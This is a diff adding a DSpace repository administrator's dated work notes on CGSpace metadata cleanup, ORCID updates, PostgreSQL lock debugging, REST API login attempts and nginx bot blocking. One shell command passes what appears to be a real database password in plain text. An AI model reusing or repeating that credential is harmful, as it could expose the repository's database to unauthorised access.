localhost/dspace= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=247 AND text_value LIKE '%http%') to /tmp/orcid-formatting.txt;
+COPY 36
+
    +
  • I think there are really just some new ones…
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/orcid-formatting.txt| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2022-12-08-orcids.txt 
+$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
+1907
+$ wc -l /tmp/2022-12-08-orcids.txt
+1939 /tmp/2022-12-08-orcids.txt
+
    +
  • Then I applied these updates on CGSpace
  • +
  • Maria mentioned that she was getting a lot more items in her daily subscription emails +
      +
    • I had a hunch it was related to me updating the last_modified timestamp after updating a bunch of countries, regions, etc in items
    • +
    • Then today I noticed this option in dspace.cfg: eperson.subscription.onlynew
    • +
    • By default DSpace sends notifications for modified items too! I’ve disabled it now…
    • +
    +
  • +
  • I applied 498 fixes and two deletions to affiliations sent by Peter
  • +
  • I applied 206 fixes and eighty-one deletions to donors sent by Peter
  • +
  • I tried to figure out how to authenticate to the DSpace 7 REST API +
      +
    • First you need a CSRF token, before you can even try to authenticate
    • +
    • Then you can authenticate, but I can’t get it to work:
    • +
    +
  • +
+
$ curl -v https://dspace7test.ilri.org/server/api
+...
+dspace-xsrf-token: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4
+...
+$ curl -v -X POST --data "user=aorth@omg.com&password=myPassword" "https://dspace7test.ilri.org/server/authn/login" -H "X-XSRF-TOKEN: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4"
+
    +
  • Start a harvest on AReS
  • +
+

2022-12-09

+ +

2022-12-11

+
    +
  • I got LDAP authentication working on DSpace 7
  • +
+

2022-12-12

+ +

2022-12-13

+ +
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count  
+-----------+---------
+ en_US     | 3050302
+ en        |     618
+           |     605
+ fr        |       2
+ vi        |       2
+ es        |       1
+           |       0
+(7 rows)
+
+dspace=# BEGIN;
+BEGIN
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '', NULL);
+UPDATE 1223
+dspace=# COMMIT;
+COMMIT
+
    +
  • I wrote an initial version of a script to map CGSpace items to Initiative collections based on their cg.contributor.initiative metadata +
      +
    • I am still considering if I want to add a mode to un-map items that are mapped to collections, but do not have the corresponding metadata tag
    • +
    +
  • +
+

2022-12-14

+
    +
  • Lots of work on PRMS related metadata issues with CGSpace +
      +
    • We noticed that PRMS uses cg.identifier.dataurl for the FAIR score, but not cg.identifier.url
    • +
    • We don’t use these consistently for datasets in CGSpace so I decided to move them to the dataurl field, but we will also ask the PRMS team to consider the normal URL field, as there are commonly other external resources related to the knowledge product there
    • +
    +
  • +
  • I updated the move-metadata-values.py script to use the latest best practices from my other scripts and some of the helper functions from util.py +
      +
    • Then I exported a list of text values pointing to Dataverse instances from cg.identifier.url:
    • +
    +
  • +
+
localhost/dspace= ☘ \COPY (SELECT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=219 AND (text_value LIKE '%persistentId%' OR text_value LIKE '%20.500.11766.1/%')) to /tmp/data.txt;
+COPY 61
+
    +
  • Then I moved them to cg.identifier.dataurl on CGSpace:
  • +
+
$ ./ilri/move-metadata-values.py -i /tmp/data.txt -db dspace -u dspace -p 'dom@in34sniper' -f cg.identifier.url -t cg.identifier.dataurl
+
    +
  • I still need to add a note to the CGSpace submission form to inform submitters about the correct field for dataset URLs
  • +
  • I finalized work on my new fix-initiative-mappings.py script +
      +
    • It has two modes: +
        +
      1. Check item metadata to see which Initiatives are tagged and then map the item if it is not yet mapped to the corresponding Initiative collection
      • +
      2. Check item collections to see which Initiatives are mapped and then unmap the item if the corresponding Initiative metadata is missing
      • +
      +
    • +
    • The second one is disabled by default until I can get more feedback from Abenet, Michael, and others
    • +
    +
  • +
  • After I applied a handful of collection mappings I started a harvest on AReS
  • +
+

2022-12-15

+
    +
  • I did some metadata quality checks on the Initiatives collection, adding some missing regions and removing a few duplicate ones
  • +
+

2022-12-18

+
    +
  • Load on the server is a bit high +
      +
    • Looking at the nginx logs I see someone from the University of Chicago (128.135.98.29) is using RStudio Desktop to query and scrape CGSpace
    • +
    +
  • +
+
# grep -c 'RStudio Desktop' /var/log/nginx/access.log
+5570
+
    +
  • RStudio is already in the ILRI bot overrides for DSpace so it shouldn’t be causing any extra hits, but I’ll put an HTTP 403 in the nginx config to tell the user to use the REST API
  • +
  • Start a harvest on AReS
  • +
+

2022-12-21

+
    +
  • I saw that load on CGSpace was over 20.0 for several hours +
      +
    • I saw there were some stuck locks in PostgreSQL:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+    948 dspaceApi
+     30 dspaceCli
+   1237 dspaceWeb
+
    +
  • Ah, it’s likely something is stuck, because I see the load has been high since yesterday at 6AM, which is 24 hours now:
  • +
+

CPU load day +PostgreSQL locks week

+
    +
  • I ran all updates and restarted the server
  • +
+

2022-12-22

+
    +
  • I exported the Initiatives collection to check the mappings +
      +
    • My fix-initiative-mappings.py script found six items that could be mapped to new collections based on metadata
    • +
    • I am still not doing automatic unmappings though…
    • +
    +
  • +
+

2022-12-23

+
    +
  • I exported the Initiatives collection to check the metadata quality +
      +
    • I fixed a few errors and missing regions using csv-metadata-quality
    • +
    +
  • +
  • Abenet and Bizu noticed some strange characters in affiliations submitted by MEL +
      +
    • They currently appear in four items, like so: Instituto Nacional de Investigaci�n y Tecnolog�a Agraria y Alimentaria, Spain (a query to find these is sketched at the end of this entry)
    • +
    • I submitted an issue on MEL’s GitHub repository
    • +
    +
  • +
+
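    +
  • To find any remaining affiliations with that broken character, a query like this should work, assuming the bad character really is U+FFFD (REPLACEMENT CHARACTER) in the database (211 is the metadata_field_id for cg.contributor.affiliation):
  • +
+
$ psql -d dspace -c "SELECT dspace_object_id, text_value FROM metadatavalue WHERE metadata_field_id=211 AND text_value ~ U&'\FFFD';"
+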

2022-12-24

+
    +
  • Export the ILRI community to try to see if there were any items with Initiative metadata that are not mapped to Initiative collections +
      +
    • I found about twenty…
    • +
    • Then I did the same for the AICCRA community
    • +
    +
  • +
+

2022-12-25

+
    +
  • The load on the server is high and I see some seemingly stuck PostgreSQL locks from dspaceCli:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+     44 dspaceApi
+     58 dspaceCli
+
    +
  • This query gives the PIDs holding the dspaceCli locks:
  • +
+
SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceCli'
+
    +
  • And the SQL queries themselves:
  • +
+
postgres=# SELECT pid, state, usename, query, query_start 
+FROM pg_stat_activity 
+WHERE pid IN (
+  SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceCli'
+);
+
    +
  • For these fifty-eight locks there are only six queries running +
      +
    • Interestingly, they all started at either 04:00 or 05:00 this morning…
    • +
    +
  • +
  • I canceled one using SELECT pg_cancel_backend(1098749); and then two of the other PIDs died, perhaps they were dependent? (a one-liner to cancel them all at once is sketched at the end of this entry) +
      +
    • Then I canceled the next one and the remaining ones died also
    • +
    +
  • +
  • I exported the entire CGSpace and then ran the fix-initiative-mappings.py script, which found 124 items to be mapped +
      +
    • Getting only the items that have new mappings from the output file is currently tricky because you have to change the file to unix encoding, capture the diff output from the original, and re-add the column headers, but at least this makes the DSpace batch import have to check WAY fewer items
    • +
    • For the record, I used grep to get only the new lines:
    • +
    +
  • +
+
$ grep -xvFf /tmp/orig.csv /tmp/cgspace-mappings.csv > /tmp/2022-12-25-fix-mappings.csv
+
    +
  • Then I imported to CGSpace, and will start an AReS harvest once its done +
      +
    • The import process was quick but it triggered a lot of Solr updates and I see locks rising from dspaceCli again
    • +
    • After five hours the Solr updating from the metadata import wasn’t finished, so I cancelled it, and I see that the items were not mapped…
    • +
    • I split the CSV into multiple files, each with ten items, and the first one imported, but the second went on to do Solr updating stuff forever…
    • +
    • All twelve files worked except the second one, so it must be something with one of those items…
    • +
    +
  • +
  • Now I started a harvest on AReS
  • +
+
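    +
  • Related to the stuck dspaceCli locks above: if I need to cancel them all at once next time, something like this should work:
  • +
+
$ psql -c "SELECT pg_cancel_backend(pid) FROM pg_stat_activity WHERE application_name = 'dspaceCli';"
+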

2022-12-28

+
    +
  • I got a notice from UptimeRobot that CGSpace was down +
      +
    • I looked at the server and the load is only 3 or 4.x, and looking at Munin I don’t see any system statistics that are alarming
    • +
    • PostgreSQL locks look fine, memory and DSpace sessions look fine…
    • +
    • There was a strangely high number of tuple accesses half an hour ago, and high CPU leading up to then
    • +
    +
  • +
+

PostgreSQL tuple access +CPU day

+
    +
  • And I can access the website just fine, so I guess everything is OK
  • +
  • I exported the Initiatives collection to tag missing regions…
  • +
+

2022-12-29

+
    +
  • I exported the Initiatives collection again and I’m wondering why we have so many items with text_lang set to NULL and other values when I have been periodically resetting them +
      +
    • It turns out that doing ... text_lang IN ('en', '', NULL) doesn’t properly check for values with NULL
    • +
    • We actually need to do:
    • +
    +
  • +
+
UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND (text_lang IS NULL OR text_lang IN ('en', ''));
+
    +
  • I updated the text lang values on CGSpace and re-exported the community +
      +
    • I fixed a bunch of invalid licenses in these items
    • +
    • Then I added mappings for another handful of items
    • +
    +
  • +
  • I tagged ORCID identifiers for another thirty items or so
  • +
  • At 8PM I got a notice from UptimeRobot again that CGSpace was down +
      +
    • The load is still only around 2.x or 3.x, but there are a lot (and increasing) number of PostgreSQL connections and locks
    • +
    • They appear to be all from the frontend:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+   2892 dspaceWeb
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+   2950 dspaceWeb
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+   3792 dspaceWeb
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+   4460 dspaceWeb
+
    +
  • I don’t see any other system statistics that look out of order… +
      +
    • DSpace sessions, network throughput, CPU, etc all seem sane…
    • +
    • And then all of a sudden, I didn’t do anything, but all the locks disappeared and I was able to access the website… WTF
    • +
    +
  • +
+

2022-12-30

+
    +
  • Start a harvest on AReS
  • +
+

2022-12-31

+
    +
  • I found a bunch of items on AReS that have issue dates in 2023 which made me curious +
      +
    • Looking closer, I think all of these have been tagged incorrectly because they were published online already in 2022
    • +
    • I sent a mail to Abenet and Bizu to ask, but I know for sure that PRMS will consider the date of first publication as the issue date, no matter whether that was online or in print
    • +
    • I also added some ORCID identifiers to our list and generated thumbnails for some journal articles that were Creative Commons
    • +
    +
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2022/01/openarchives-registration.png b/docs/2022/01/openarchives-registration.png new file mode 100644 index 000000000..39344c6ca Binary files /dev/null and b/docs/2022/01/openarchives-registration.png differ diff --git a/docs/2022/02/fw_packets-day-fs8.png b/docs/2022/02/fw_packets-day-fs8.png new file mode 100644 index 000000000..b73940093 Binary files /dev/null and b/docs/2022/02/fw_packets-day-fs8.png differ diff --git a/docs/2022/02/jmx_dspace_sessions-day-fs8.png b/docs/2022/02/jmx_dspace_sessions-day-fs8.png new file mode 100644 index 000000000..fc98d42bf Binary files /dev/null and b/docs/2022/02/jmx_dspace_sessions-day-fs8.png differ diff --git a/docs/2022/02/jmx_tomcat_dbpools-day-fs8.png b/docs/2022/02/jmx_tomcat_dbpools-day-fs8.png new file mode 100644 index 000000000..f72e7fd99 Binary files /dev/null and b/docs/2022/02/jmx_tomcat_dbpools-day-fs8.png differ diff --git a/docs/2022/02/postgres_connections_db-day-fs8.png b/docs/2022/02/postgres_connections_db-day-fs8.png new file mode 100644 index 000000000..9bcf708e3 Binary files /dev/null and b/docs/2022/02/postgres_connections_db-day-fs8.png differ diff --git a/docs/2022/03/postgres_size_cgspace-day.png b/docs/2022/03/postgres_size_cgspace-day.png new file mode 100644 index 000000000..efca542b5 Binary files /dev/null and b/docs/2022/03/postgres_size_cgspace-day.png differ diff --git a/docs/2022/04/cgspace-load.png b/docs/2022/04/cgspace-load.png new file mode 100644 index 000000000..02851e3d6 Binary files /dev/null and b/docs/2022/04/cgspace-load.png differ diff --git a/docs/2022/04/jmx_dspace_sessions-day.png b/docs/2022/04/jmx_dspace_sessions-day.png new file mode 100644 index 000000000..aa51dc960 Binary files /dev/null and b/docs/2022/04/jmx_dspace_sessions-day.png differ diff --git a/docs/2022/04/jmx_dspace_sessions-day2.png b/docs/2022/04/jmx_dspace_sessions-day2.png new file mode 100644 index 000000000..8f77487a1 Binary files /dev/null and b/docs/2022/04/jmx_dspace_sessions-day2.png differ diff --git a/docs/2022/04/postgres_connections_ALL-day.png b/docs/2022/04/postgres_connections_ALL-day.png new file mode 100644 index 000000000..926362a1b Binary files /dev/null and b/docs/2022/04/postgres_connections_ALL-day.png differ diff --git a/docs/2022/07/cpu-day.png b/docs/2022/07/cpu-day.png new file mode 100644 index 000000000..e0bce741c Binary files /dev/null and b/docs/2022/07/cpu-day.png differ diff --git a/docs/2022/07/cpu-day2.png b/docs/2022/07/cpu-day2.png new file mode 100644 index 000000000..53a52dccd Binary files /dev/null and b/docs/2022/07/cpu-day2.png differ diff --git a/docs/2022/07/jmx_dspace_sessions-week.png b/docs/2022/07/jmx_dspace_sessions-week.png new file mode 100644 index 000000000..67487cb08 Binary files /dev/null and b/docs/2022/07/jmx_dspace_sessions-week.png differ diff --git a/docs/2022/07/jmx_dspace_sessions-week2.png b/docs/2022/07/jmx_dspace_sessions-week2.png new file mode 100644 index 000000000..8a4961aa3 Binary files /dev/null and b/docs/2022/07/jmx_dspace_sessions-week2.png differ diff --git a/docs/2022/07/jmx_tomcat_dbpools-day.png b/docs/2022/07/jmx_tomcat_dbpools-day.png new file mode 100644 index 000000000..e1d251489 Binary files /dev/null and b/docs/2022/07/jmx_tomcat_dbpools-day.png differ diff --git a/docs/2022/07/postgres_locks_ALL-week.png b/docs/2022/07/postgres_locks_ALL-week.png new file mode 100644 index 000000000..9079e8f19 Binary files /dev/null and b/docs/2022/07/postgres_locks_ALL-week.png differ diff --git 
a/docs/2022/07/postgres_querylength_ALL-week.png b/docs/2022/07/postgres_querylength_ALL-week.png new file mode 100644 index 000000000..5cb704313 Binary files /dev/null and b/docs/2022/07/postgres_querylength_ALL-week.png differ diff --git a/docs/2022/08/dspace7-submission.png b/docs/2022/08/dspace7-submission.png new file mode 100644 index 000000000..86d15e18b Binary files /dev/null and b/docs/2022/08/dspace7-submission.png differ diff --git a/docs/2022/10/cpu-day.png b/docs/2022/10/cpu-day.png new file mode 100644 index 000000000..d23fe7a1f Binary files /dev/null and b/docs/2022/10/cpu-day.png differ diff --git a/docs/2022/10/cpu-month.png b/docs/2022/10/cpu-month.png new file mode 100644 index 000000000..5333f6e11 Binary files /dev/null and b/docs/2022/10/cpu-month.png differ diff --git a/docs/2022/10/cpu-year.png b/docs/2022/10/cpu-year.png new file mode 100644 index 000000000..2ed1fbdab Binary files /dev/null and b/docs/2022/10/cpu-year.png differ diff --git a/docs/2022/10/gs-10568-116598.pdf.jpg b/docs/2022/10/gs-10568-116598.pdf.jpg new file mode 100644 index 000000000..b5e5402c3 Binary files /dev/null and b/docs/2022/10/gs-10568-116598.pdf.jpg differ diff --git a/docs/2022/10/pdftocairo-10568-116598.pdf.jpg b/docs/2022/10/pdftocairo-10568-116598.pdf.jpg new file mode 100644 index 000000000..70ab06642 Binary files /dev/null and b/docs/2022/10/pdftocairo-10568-116598.pdf.jpg differ diff --git a/docs/2022/11/postgres_locks_cgspace-day.png b/docs/2022/11/postgres_locks_cgspace-day.png new file mode 100644 index 000000000..2c5651a8f Binary files /dev/null and b/docs/2022/11/postgres_locks_cgspace-day.png differ diff --git a/docs/2022/12/cpu-day.png b/docs/2022/12/cpu-day.png new file mode 100644 index 000000000..3e790776a Binary files /dev/null and b/docs/2022/12/cpu-day.png differ diff --git a/docs/2022/12/cpu-day2.png b/docs/2022/12/cpu-day2.png new file mode 100644 index 000000000..40f40a86c Binary files /dev/null and b/docs/2022/12/cpu-day2.png differ diff --git a/docs/2022/12/postgres_locks_ALL-week.png b/docs/2022/12/postgres_locks_ALL-week.png new file mode 100644 index 000000000..0a7f00f1e Binary files /dev/null and b/docs/2022/12/postgres_locks_ALL-week.png differ diff --git a/docs/2022/12/postgres_tuples_cgspace-day.png b/docs/2022/12/postgres_tuples_cgspace-day.png new file mode 100644 index 000000000..91f8a16f4 Binary files /dev/null and b/docs/2022/12/postgres_tuples_cgspace-day.png differ diff --git a/docs/2023-01/index.html b/docs/2023-01/index.html new file mode 100644 index 000000000..a1911de62 --- /dev/null +++ b/docs/2023-01/index.html @@ -0,0 +1,881 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + January, 2023 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

January, 2023

+ +
+

2023-01-01

+
    +
  • Apply some more ORCID identifiers to items on CGSpace using my 2022-09-22-add-orcids.csv file +
      +
    • I want to update all ORCID names and refresh them in the database
    • +
    • I see we have some new ones that aren’t in our list if I combine with this file:
    • +
    +
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l                         
+1939
+$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
+1973
+
    +
  • I will extract and process them with my resolve-orcids.py script:
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-01-01-orcids.txt
+$ ./ilri/resolve-orcids.py -i /tmp/2023-01-01-orcids.txt -o /tmp/2023-01-01-orcids-names.txt -d
+
    +
  • Then update them in the database:
  • +
+
$ ./ilri/update-orcids.py -i /tmp/2023-01-01-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
+
    +
  • Load on CGSpace is high around 9.x +
      +
    • I see there is a CIAT bot harvesting via the REST API with IP 45.5.186.2
    • +
    • Other than that I don’t see any particular system stats as alarming
    • +
    • There has been a marked increase in load in the last few weeks, perhaps due to Initiative activity…
    • +
    • Perhaps there are some stuck PostgreSQL locks from CLI tools?
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+     58 dspaceCli
+     46 dspaceWeb
+
    +
  • The current time on the server is 08:52 and I see the dspaceCli locks were started at 04:00 and 05:00… so I need to check which cron jobs those belong to, as I think I noticed this last month too (a quick way to check is sketched below) +
      +
    • I’m going to wait and see if they finish, but by tomorrow I will kill them
    • +
    +
  • +
+
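    +
  • To see which cron jobs those locks might belong to, I can check the dspace user’s crontab for entries scheduled at 04:00 or 05:00 (assuming the jobs live in that user’s crontab):
  • +
+
# crontab -l -u dspace | grep -E '^[0-9]+[[:space:]]+(4|5)[[:space:]]'
+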

2023-01-02

+
    +
  • The load on the server is now very low and there are no more locks from dspaceCli +
      +
    • So there was some long-running process that was running and had to finish!
    • +
    • That finally sheds some light on the “high load on Sunday” problem where I couldn’t find any other distinct pattern in the nginx or Tomcat requests
    • +
    +
  • +
+

2023-01-03

+
    +
  • The load from the server on Sundays, which I have noticed for a long time, seems to be coming from the DSpace checker cron job +
      +
    • This checks the checksums of all bitstreams to see if they match the ones in the database
    • +
    +
  • +
  • I exported the entire CGSpace metadata to do country/region checks with csv-metadata-quality +
      +
    • I extracted only the items with countries, which was about 48,000, then split the file into parts of 10,000 items, but the upload found 2,000 changes in the first one and took several hours to complete… (the filtering and splitting are sketched at the end of this entry)
    • +
    +
  • +
  • IWMI sent me ORCID identifiers for new scientists, bringing our total to 2,010
  • +
+
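    +
  • A sketch of the country filtering and splitting on the command line (the column name follows the DSpace CSV export convention; csvgrep is from csvkit):
  • +
+
$ csvgrep -c 'cg.coverage.country[en_US]' -r '.' /tmp/cgspace.csv > /tmp/items-with-countries.csv
+$ tail -n +2 /tmp/items-with-countries.csv | split -l 10000 - /tmp/countries-chunk- # naive line-based split, fine as long as no field has embedded newlines
+$ for chunk in /tmp/countries-chunk-*; do cat <(head -n1 /tmp/items-with-countries.csv) "$chunk" > "$chunk.csv"; done
+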

2023-01-04

+
    +
  • I finally finished applying the region imports (in five batches of 10,000) +
      +
    • It was about 7,500 missing regions in total…
    • +
    +
  • +
  • Now I will move on to doing the Initiative mappings +
      +
    • I modified my fix-initiative-mappings.py script to only write out the items that have updated mappings
    • +
    • This makes it way easier to apply fixes to the entire CGSpace because we don’t try to import 100,000 items with no changes in mappings
    • +
    +
  • +
  • More dspaceCli locks from 04:00 this morning (current time on server is 07:33) and today is a Wednesday +
      +
    • The checker cron job runs on days 0 and 3 of the week (Sunday and Wednesday), so this is from that…
    • +
    • Finally at 16:30 I decided to kill the PIDs associated with those locks…
    • +
    • I am going to disable that cron job for now and watch the server load for a few weeks
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+

2023-01-08

+
    +
  • It’s Sunday and I see some PostgreSQL locks belonging to dspaceCli that started at 05:00 +
      +
    • That’s strange because I disabled the dspace checker cron job last week, so I’m not sure which job this is…
    • +
    • It’s currently 2:30PM on the server so these locks have been there for almost twelve hours
    • +
    +
  • +
  • I exported the entire CGSpace to update the Initiative mappings +
      +
    • Items were mapped to ~58 new Initiative collections
    • +
    +
  • +
  • Then I ran the ORCID import to catch any new ones that might not have been tagged
  • +
  • Then I started a harvest on AReS
  • +
+

2023-01-09

+
    +
  • Fix some invalid Initiative names on CGSpace and then check for missing mappings
  • +
  • Check for missing regions in the Initiatives collection
  • +
  • Export a list of author affiliations from the Initiatives community for Peter to check +
      +
    • Was slightly ghetto because I did it from a CSV export of the Initiatives community, then imported to OpenRefine to split multi-value fields, then did some sed nonsense to handle the quoting:
    • +
    +
  • +
+
$ csvcut -c 'cg.contributor.affiliation[en_US]' ~/Downloads/2023-01-09-initiatives.csv | \
+  sed -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' | \
+  sort -u | \
+  sed -e 's/^\(.*\)/"\1/' -e 's/\(.*\)$/\1"/' > /tmp/2023-01-09-initiatives-affiliations.csv
+

2023-01-10

+
    +
  • Export the CGSpace Initiatives collection to check for missing regions and collection mappings
  • +
+

2023-01-11

+
    +
  • I’m trying the DSpace 7 REST API again + +
  • +
+
$ curl --head https://dspace7test.ilri.org/server/api
+...
+set-cookie: DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519; Path=/server; Secure; HttpOnly; SameSite=None
+dspace-xsrf-token: 42c78c56-613d-464f-89ea-79142fc5b519
+$ curl -v -X POST https://dspace7test.ilri.org/server/api/authn/login --data "user=alantest%40cgiar.org&password=dspace" -H "X-XSRF-TOKEN: 42c78c56-613d-464f-89ea-79142fc5b519" -b "DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519"
+...
+authorization: Bearer eyJh...9-0
+$ curl -v "https://dspace7test.ilri.org/api/core/items" -H "Authorization: Bearer eyJh...9-0"
+
    +
  • I created a pull request to fix the docs
  • +
  • I did quite a lot of cleanup and updates on the IFPRI batch items for the Gender Equality batch upload +
      +
    • Then I uploaded them to CGSpace
    • +
    +
  • +
  • I added about twenty more ORCID identifiers to my list and tagged them on CGSpace
  • +
+

2023-01-12

+
    +
  • I exported the entire CGSpace and did some cleanups on all metadata in OpenRefine +
      +
    • I was primarily interested in normalizing the DOIs, but I also normalized a bunch of publishing places
    • +
    • After this import finishes I will export it again to do the Initiative and region mappings
    • +
    • I ran the fix-initiative-mappings.py script and got forty-nine new mappings…
    • +
    +
  • +
  • I added several dozen new ORCID identifiers to my list and tagged ~500 on CGSpace
  • +
  • Start a harvest on AReS
  • +
+

2023-01-13

+
    +
  • Do a bit more cleanup on licenses, issue dates, and publishers +
      +
    • Then I started importing my large list of 5,000 items changed from yesterday
    • +
    +
  • +
  • Help Karen add abstracts to a bunch of SAPLING items that were missing them on CGSpace +
      +
    • For now I only did open access journal articles, but I should do the reports and others too
    • +
    +
  • +
+

2023-01-14

+
    +
  • Export CGSpace and check for missing Initiative mappings +
      +
    • There were a total of twenty-five
    • +
    • Then I exported the Initiatives community to check the countries and regions
    • +
    +
  • +
+

2023-01-15

+
    +
  • Start a harvest on AReS
  • +
+

2023-01-16

+
    +
  • Batch import four IFPRI items for CGIAR Initiative on Low-Emission Food Systems
  • +
  • Batch import another twenty-eight items for IFPRI across several Initiatives +
      +
    • On this one I did quite a bit of extra work to check for CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc
    • +
    • I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts
    • +
    • Then I checked for duplicates and ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values
    • +
    +
  • +
+

2023-01-17

+
    +
  • Batch import another twenty-three items for IFPRI across several Initiatives +
      +
    • I checked the IFPRI eBrary for extra CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc
    • +
    • I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts
    • +
    • Then I found and removed one duplicate in these items, as well as another on CGSpace already (!): 10568/126669
    • +
    • Then I ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values
    • +
    +
  • +
  • I exported the Initiatives collection to check the mappings, regions, and other metadata with csv-metadata-quality
  • +
  • I also added a bunch of ORCID identifiers to my list and tagged 837 new metadata values on CGSpace
  • +
  • There is a high load on CGSpace pretty regularly +
      +
    • Looking at Munin it shows there is a marked increase in DSpace sessions the last few weeks:
    • +
    +
  • +
+

DSpace sessions year

+
    +
  • Is this attributable to all the PRMS harvesting?
  • +
  • I also see some PostgreSQL locks starting earlier today:
  • +
+

PostgreSQL locks day

+
    +
  • I’m curious to see what kinds of IPs have been connecting, so I will look at the last few weeks:
  • +
+
# zcat --force /var/log/nginx/{rest,access,library-access,oai}.log /var/log/nginx/{rest,access,library-access,oai}.log.1 /var/log/nginx/{rest,access,library-access,oai}.log.{2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25}.gz | awk '{print $1}' | sort | uniq > /tmp/2023-01-17-cgspace-ips.txt
+# wc -l /tmp/2023-01-17-cgspace-ips.txt 
+129446 /tmp/2023-01-17-cgspace-ips.txt
+
    +
  • I ran the IPs through my resolve-addresses-geoip2.py script to resolve their ASNs/networks, then extracted some lists of data center ISPs by eyeballing them (Amazon, Google, Microsoft, Apple, DigitalOcean, HostRoyale, and a dozen others):
  • +
+
$ csvgrep -c asn -r '^(8075|714|16276|15169|23576|24940|13238|32934|14061|12876|55286|203020|204287|7922|50245|6939|16509|14618)$' \
+  /tmp/2023-01-17-cgspace-ips.csv | csvcut -c network | \
+  sed 1d | sort | uniq > /tmp/networks-to-block.txt
+$ wc -l /tmp/networks-to-block.txt 
+776 /tmp/networks-to-block.txt
+
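For reference, the ASN resolution step itself can be sketched in Python with the geoip2 library and a local GeoLite2 ASN database (an illustration only; resolve-addresses-geoip2.py also records the network column that the csvgrep above filters on):

import csv
import geoip2.database  # pip install geoip2
from geoip2.errors import AddressNotFoundError

# Assumes a local copy of MaxMind's GeoLite2 ASN database
reader = geoip2.database.Reader("GeoLite2-ASN.mmdb")

with open("/tmp/2023-01-17-cgspace-ips.txt") as ips, \
     open("/tmp/2023-01-17-cgspace-asns.csv", "w", newline="") as out:
    writer = csv.writer(out)
    writer.writerow(["ip", "asn", "org"])
    for ip in (line.strip() for line in ips):
        try:
            response = reader.asn(ip)
        except AddressNotFoundError:
            continue
        writer.writerow([ip, response.autonomous_system_number,
                         response.autonomous_system_organization])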
    +
  • I added the list of networks to nginx’s bot-networks.conf so they will all be heavily rate limited
  • +
  • Looking at the Munin stats again I see the load has been extra high since yesterday morning:
  • +
+

